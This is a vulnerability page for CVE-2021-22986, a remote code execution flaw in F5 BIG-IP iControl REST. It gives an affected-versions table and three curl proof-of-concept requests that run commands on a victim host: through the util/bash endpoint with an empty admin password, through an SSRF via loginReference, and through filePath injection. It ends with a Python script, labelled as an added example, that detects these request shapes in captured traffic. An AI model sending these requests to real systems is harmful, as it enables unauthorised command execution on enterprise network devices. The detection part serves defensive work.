# CVE-2021-22986 F5 BIG-IP iControl RCE Vulnerability

==Vulnerability Impact==
* Execute arbitrary system commands
* Create or delete files
* Disable services
==Affected Versions==
{| class="wikitable"
! Product !! Branch !! Versions known to be vulnerable !! Fixes introduced in
|-
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) || 16.x || 16.0.0 – 16.0.1 || 16.0.1.1
|-
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) || 15.x || 15.1.0 – 15.1.2 || 15.1.2.1
|-
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) || 14.x || 14.1.0 – 14.1.3 || 14.1.4
|-
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) || 13.x || 13.1.0 – 13.1.3 || 13.1.3.6
|-
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) || 12.x || 12.1.0 – 12.1.5 || 12.1.5.3*
|-
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) || 11.x || None || Not applicable
|-
| BIG-IQ Centralized Management || 8.x || None || 8.0.0
|-
| BIG-IQ Centralized Management || 7.x || 7.1.0, 7.0.0 || 7.1.0.3, 7.0.0.2
|-
| BIG-IQ Centralized Management || 6.x || 6.0.0 – 6.1.0 || None
|}

==POC==
1.

curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'

2.

curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'

3.

curl -ksu admin:[redacted] https://[victimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'
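
A detection-side view of the three request shapes in the POC section, as an added example that is not part of the original page: it classifies captured management-interface requests. The record schema (`path`, `auth`, `body`), the sample record and the rule that a legitimate `filePath` is a plain absolute path are assumptions made for illustration.

```python
import base64
import json
import re

# Endpoints named in the three POC requests on this page.
BASH_UTIL = "/mgmt/tm/util/bash"
AUTHN_LOGIN = "/mgmt/shared/authn/login"
BUNDLE_TASKS = "/mgmt/tm/access/bundle-install-tasks"
LOOPBACK = re.compile(r"(?i)https?://(localhost|127\.0\.0\.1|\[::1\])([:/]|$)")
# Assumption: a legitimate filePath is a plain absolute path.
PLAIN_PATH = re.compile(r"/[\w./-]+")


def empty_basic_password(auth_header):
    """True for Basic credentials of the form 'user:' (empty password)."""
    scheme, _, blob = auth_header.partition(" ")
    try:
        creds = base64.b64decode(blob).decode()
    except ValueError:  # bad base64 or bad UTF-8
        return False
    return scheme.lower() == "basic" and bool(re.fullmatch(r"[^:]+:", creds))


def classify(record):
    """Findings for one captured request; the record schema is hypothetical."""
    path = record["path"].split("?")[0].rstrip("/")
    try:
        body = json.loads(record.get("body") or "{}")
    except ValueError:
        body = {}
    body = body if isinstance(body, dict) else {}
    findings = []
    if path == BASH_UTIL and empty_basic_password(record.get("auth") or ""):
        findings.append("util/bash request with empty Basic password")
    ref = body.get("loginReference")
    link = ref.get("link") if isinstance(ref, dict) else None
    if path == AUTHN_LOGIN and isinstance(link, str) and LOOPBACK.match(link):
        findings.append("loginReference targets loopback")
    file_path = body.get("filePath")
    if path in (AUTHN_LOGIN, BUNDLE_TASKS) and isinstance(file_path, str):
        if not PLAIN_PATH.fullmatch(file_path):
            findings.append("filePath is not a plain absolute path")
    return findings


# Constructed sample shaped like request 2 in the POC section.
SAMPLE = {"path": AUTHN_LOGIN, "body": json.dumps({
    "bigipAuthCookie": "", "filePath": "`id`",
    "loginReference": {"link": "http://localhost" + BUNDLE_TASKS}})}
SAMPLE_FINDINGS = classify(SAMPLE)
```

Request bodies are needed for the last two rules, so this only works where the capture point (reverse proxy, WAF or packet capture after TLS termination) records them.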